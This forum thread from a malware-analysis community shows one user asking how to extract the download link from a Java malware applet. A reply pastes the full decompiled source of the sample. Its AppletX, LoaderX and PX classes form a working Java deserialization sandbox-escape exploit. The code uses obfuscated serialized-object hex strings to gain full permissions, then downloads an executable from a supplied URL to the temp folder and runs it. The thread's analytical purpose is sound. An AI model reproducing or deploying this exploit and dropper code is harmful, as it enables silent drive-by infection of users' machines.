Results 1 to 3 of 3

Thread: JAVA malware

  1. #1
    BATMAN
    Guest

    JAVA malware

    How can I get a malicious link from java malware?I use Java Decompiler, but I haven't find a link.....Please help (I'm not strong in JAVA)
    Here JAVA MALWARE
    pass infected

    P.S.Sorry for rules....
    Attached Files Attached Files
    Last edited by BATMAN; February 28th, 2010 at 06:18.
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  2. #2
    Hi,

    So I guess you decompiled the Java class and found out the strings were either encrypted and concatened/appended all together.
    It is also clear that it is dropping an exe with a name randomly generated.

    You could try to hack the code to get it running and retrieve the url while sniffing, you could also sort every strings and manually process every manipulation.

    MALICIOUS CODE

    PX.class
    Code:
    / Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov  Date: 28/02/2010 12:43:59
    // Home Page : http://members.fortunecity.com/neshkov/dj.html  - Check often for new version!
    // Decompiler options: packimports(3) 
    // Source File Name:   PX.java
    
    package myf.y;
    
    import java.io.*;
    import java.net.URL;
    import java.security.AccessController;
    import java.security.PrivilegedExceptionAction;
    
    public class PX
        implements PrivilegedExceptionAction
    {
    
        public static byte[] StringToBytes(String s)
        {
            byte abyte0[] = new byte[s.length() / 2];
            String s1 = "sdjffjjjjjjjjjjsdfsduuuujf8ds";
            for(int i = 0; i < s.length(); i += 2)
                abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));
    
            return abyte0;
        }
    
        public Object run()
            throws Exception
        {
            if(data == null)
                return null;
            try
            {
                String s = "os.name";
                String s1 = "00057372001B6A6176612E7574696C2E477265676F7";
                String s2 = "Windows";
                String s3 = System.getProperty(s);
                String s4 = "00057372001B6A6176612E7574696C2E477265676Fasd7";
                if(s3.indexOf(s2) >= 0)
                {
                    int i = 1;
                    if(cc != null)
                        i = Integer.parseInt(cc);
                    for(int j = 0; j < i; j++)
                    {
                        URL url = new URL((new StringBuilder()).append(data).append(Integer.toString(j)).toString());
                        url.openConnection();
                        InputStream inputstream = url.openStream();
                        String s5 = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
                        String s6 = (new StringBuilder()).append(System.getProperty("java.io.tmpdir")).append(File.separator).append(Math.random()).append(".exe").toString();
                        FileOutputStream fileoutputstream = new FileOutputStream(s6);
                        int k;
                        int l;
                        for(l = 0; (k = inputstream.read()) != -1; l++)
                            fileoutputstream.write(k);
    
                        inputstream.close();
                        fileoutputstream.close();
                        String s7 = "6E69656E744900166D696E696D616C44617973496E    46697273745765656B4900096E6578745374616D704   9001573657269616C56657273696F6E4F6E53747265   616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
                        if(l >= 1024)
                            Runtime.getRuntime().exec(s6);
                    }
    
                }
            }
            catch(Exception exception) { }
            return null;
        }
    
        public PX()
        {
            try
            {
                AccessController.doPrivileged(this);
            }
            catch(Exception exception) { }
        }
    
        public static String data = null;
        public static String cc = null;
    
    }
    LoaderX.class
    Code:
    // Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov  Date: 28/02/2010 12:35:03
    // Home Page : http://members.fortunecity.com/neshkov/dj.html  - Check often for new version!
    // Decompiler options: packimports(3) 
    // Source File Name:   LoaderX.java
    
    package myf.y;
    
    import java.io.*;
    import java.lang.reflect.Field;
    import java.net.URL;
    import java.security.*;
    import java.security.cert.Certificate;
    
    public class LoaderX extends ClassLoader
        implements Serializable
    {
    
        public LoaderX()
        {
        }
    
        private void writeObject(ObjectOutputStream objectoutputstream)
            throws IOException, ClassNotFoundException
        {
            objectoutputstream.defaultWriteObject();
        }
    
        private void readObject(ObjectInputStream objectinputstream)
            throws IOException, ClassNotFoundException
        {
            instance = this;
            objectinputstream.defaultReadObject();
        }
    
        public void bootstrapPayload(String s, String s1)
            throws IOException
        {
            Object obj = null;
            try
            {
                ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
                byte abyte0[] = new byte[8192];
                InputStream inputstream = getClass().getResourceAsStream("/myf/y/PX.class");
                String s2 = "6E69656E744900166D696E696D616C446179734  96E46697273745765656B4900096E657874537461  6D7049001573657269616C56657273696F6E4F6E53  747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
                int i;
                while((i = inputstream.read(abyte0)) > 0) 
                    bytearrayoutputstream.write(abyte0, 0, i);
                abyte0 = bytearrayoutputstream.toByteArray();
                URL url = new URL("file:///"); // strange url innit ?
                Certificate acertificate[] = new Certificate[0];
                Permissions permissions = new Permissions();
                permissions.add(new AllPermission());
                ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(url, acertificate), permissions);
                Class class1 = defineClass("myf.y.PX", abyte0, 0, abyte0.length, protectiondomain);
                if(class1 != null)
                {
                    Field field = class1.getField("data");
                    Field field1 = class1.getField("cc");
                    Object obj1 = class1.newInstance();
                    field.set(obj1, s);
                    field1.set(obj1, s1);
                    obj1 = class1.newInstance();
                }
            }
            catch(Exception exception) { }
        }
    
        private static final long serialVersionUID = 0x5e8b4c67ddc409d8L;
        public static LoaderX instance = null;
    
    }
    AppletX.class
    Code:
    // Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov  Date: 28/02/2010 12:44:49
    // Home Page : http://members.fortunecity.com/neshkov/dj.html  - Check often for new version!
    // Decompiler options: packimports(3) 
    // Source File Name:   AppletX.java
    
    package myf.y;
    
    import java.applet.Applet;
    import java.io.ByteArrayInputStream;
    import java.io.ObjectInputStream;
    
    // Referenced classes of package myf.y:
    //            PX, LoaderX
    
    public class AppletX extends Applet
    {
    
        public AppletX()
        {
            serializedObject = (new StringBuilder()).append("ACED").append(ff).append("269616E").append(a34).append("00A").toString();
        }
    
        public void init()
        {
            try
            {
                String s = "000000";
                String s1 = "5469";
                String s2 = (new StringBuilder()).append("0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E03000B5A000C6172654669656C647353657449000E66697273744461794F665765656B5A00096973").append(s1).append("6D655365745A00076C656E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F").append(s1).append("6D655A6F6E653B787001").append(s).append("010101").append(s).append("01").append(s).append("02").append(s).append("0100000121563A").toString();
                String s3 = (new StringBuilder()).append("200014A").append(s2).append("FC0E757200025B494DBA602676EAB2A5020000787").append(s).append("011").append(s).append("01000007D9").append(s).append("04").append(s).append("15").append(s).append("04").append(s).append("12").append(s).append("8A").append(s).append("02").append(s).append("03").append(s).append("01").append(s).append("04").append(s).append("1").append(s).append("011").append(s).append("22000002DEFE488C").append(s).append("0000757200025B5A578F203914B85DE2020000787").append(s).append("0110101010101010").toString();
                String s4 = (new StringBuilder()).append("6444617949000C656E644461794F665765656B490007656E644D6F6465490008656E644D6F6E7468490007656E64").append(s1).append("6D6549000B656E64").append(s1).append("6D654D6F64654900097261774F666673657449001573657269616C56657273696F6E4F6E53747265616D490008737461727444617949000E73746172744461794F665765656B49000973746172744D6F646549000A73746172744D6F6E74684900097374617274").append(s1).append("6D6549000D7374617274").append(s1).append("6D654D6F64654900097374617274596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B42787200126A6176612E7574696C2E").append(s1).append("6D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B787074000E416D65726963612F446177736F6E0036EE8").append(s).append("000000000").append(s).append("000000").append(s).append("000000").append(s).append("0000FE4").toString();
                ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(PX.StringToBytes((new StringBuilder()).append("ACED00057372001B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7D6E5B0D0C10").append(s3).append("101010101010101010101737200186A6176612E7574696C2E53696D706C65").append(s1).append("6D655A6F6E65FA675D60D15EF5A603001249000A647374536176696E6773490006656E").append(s4).append("88C").append(s).append("0002").append(s).append("000000").append(s).append("000000").append(s).append("000000").append(s).append("000000").append(s).append("0000757200025B42ACF317F8060854E0020000787").append(s).append("00C1F1C1F1E1F1E1F1F1E1F1E1F770A").append(s).append("06").append(s).append("0000007571007E0006").append(s).append("02").append(s).append("0000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E2F964AC000A").toString())));
                Object obj = objectinputstream.readObject();
                if(obj != null && LoaderX.instance != null)
                {
                    String s5 = getParameter("data");
                    String s6 = getParameter("cc");
                    if(s5 == null)
                        s5 = "";
                    LoaderX.instance.bootstrapPayload(s5, s6);
                }
            }
            catch(Exception exception) { }
        }
    
        private static final long serialVersionUID = 0xd30f41af207ff1c8L;
        private static String ff = "00057372001B6A6176612E7574696C2E477265676F7";
        private static String as;
        private static String afc;
        private static String afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha;
        private static String afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha;
        private static String lol;
        private static String kol;
        private static String gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj;
        private static String kkk;
        private static String asa;
        private static String abc;
        private static String a5 = "sdfsd fsdf hsd fkjw fekwe gfrjkg kj54 tkj nkj4 609hyi9h0009e433333333333333333333333333333333333349tugreo9ug 9rugjjjjjjj9 woiuwwwwwwwwwwwwwwwwwwuqrfj 29fu 09epwoooooooooog poreig iorehg oia;sjhdfiosjgf dhhhhhhhhhhhhh";
        private static String klls;
        private static String a1;
        private static String a2;
        private static String a31;
        private static String a32;
        private static String a33;
        public static String a34;
        private final String serializedObject;
        public static String data = null;
    
        static 
        {
            as = "00000";
            afc = "44461794";
            afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha = "646549000";
            afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
            lol = "73657269616C56657273696F6E4F6E53747265616D4900087";
            kol = "6F6E7468490007656E6454696D6549000B656E6454696D6";
            gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj = "4596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B42787200126A6176612E7574696C2E54696D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B787074000E4";
            kkk = "2744D6F6E7468490009737461727454696D6549000D7374617";
            asa = "010101010101010101737200186A6176612E7574696C2E53696D706C6554696D655A6F6E65FA675D60D15EF5A603001249000A64737453";
            abc = "B0D0C10200014A0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E03000B5A000C6172654669656C647353657449";
            klls = (new StringBuilder()).append("87001").append(as).append("0010101").append(as).append("001").append(as).append("002").append(as).append("001").append(as).append("121563AFC0E757200025B494DBA602676EAB2A5020000787").append(as).append("0011").append(as).append("001").append(as).append("7D9").append(as).append("004").append(as).append("015").append(as).append("004").append(as).append("012").append(as).append("08A").append(as).append("002").append(as).append("003").append(as).append("001").append(as).append("004").append(as).append("01").append(as).append("0011").append(as).append("022").append(as).append("2DEFE488C").append(as).append("00000757200025B5A578F203914B85DE2020000787").append(as).append("00110101010101010101").append(asa).append("6176696E6773490006656E6").append(afc).append("9000C656E6").append(afc).append("F665765656B490007656E644D6F").append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("8656E644D").append(kol).append("54D6F").append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("97261774F6666736574490015").append(lol).append("37461727").append(afc).append("9000E737461727").append(afc).append("F665765656B49000973746172744D6F").append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("A73").toString();
            a1 = (new StringBuilder()).append("0007571007E0006").append(as).append("002").append(as).append("00000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E").toString();
            a2 = (new StringBuilder()).append("61727").append(gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj).append("16D65726963612F446177736F6E0036EE8").append(as).append("00000").append(as).append("00000").append(as).append("00000").append(as).append("00000").append(as).append("0000FE488C0000000002").append(as).append("00000").append(as).append("00000").append(as).append("00000").append(as).append("00000").append(as).append("00000").append(as).append("000757200025B42ACF317F8060854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1F770A").append(as).append("006").append(as).append("0000").append(a1).append("2F96").toString();
            a31 = (new StringBuilder()).append("9697354696D655365745A00076C65").append(afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha).append("F6E6").toString();
            a32 = (new StringBuilder()).append("000").append(a31).append("53B7").append(klls).append("74617").append(kkk).append("27454696D654D6F").append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("97374").append(a2).append("4A").toString();
            a33 = (new StringBuilder()).append("C656E6461728F3DD7D6E5").append(abc).append("000E666972737").append(afc).append("F665").toString();
            a34 = (new StringBuilder()).append("43616").append(a33).append("765656B5A").append(a32).append("C0").toString();
        }
    }
    Last edited by Silkut; February 28th, 2010 at 06:53. Reason: biohazard code added (non executable)
    Please consider donating to help Woodmann.com staying online (here is why).
    Any amount greatly appreciated. Thank you.

  3. #3
    BATMAN
    Guest
    Maybe there is the way to debug it?
    I promise that I have read the FAQ and tried to use the Search to answer my question.

Similar Threads

  1. [EXPLOIT][JAVA][1.7.0_10]
    By OHPens_Blog in forum Blogs Forum
    Replies: 0
    Last Post: January 10th, 2013, 19:51
  2. Is this malware?
    By bboitano in forum Malware Analysis and Unpacking Forum
    Replies: 2
    Last Post: December 18th, 2009, 07:18
  3. Where to download malware?
    By Cthulhu in forum Malware Analysis and Unpacking Forum
    Replies: 11
    Last Post: February 18th, 2009, 05:52
  4. Some VB malware
    By b3n in forum Malware Analysis and Unpacking Forum
    Replies: 3
    Last Post: November 24th, 2008, 11:38
  5. ESSAYS ABOUT JAVA CRACKING ?
    By jNS in forum Advanced Reversing and Programming
    Replies: 2
    Last Post: February 24th, 2001, 06:17

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •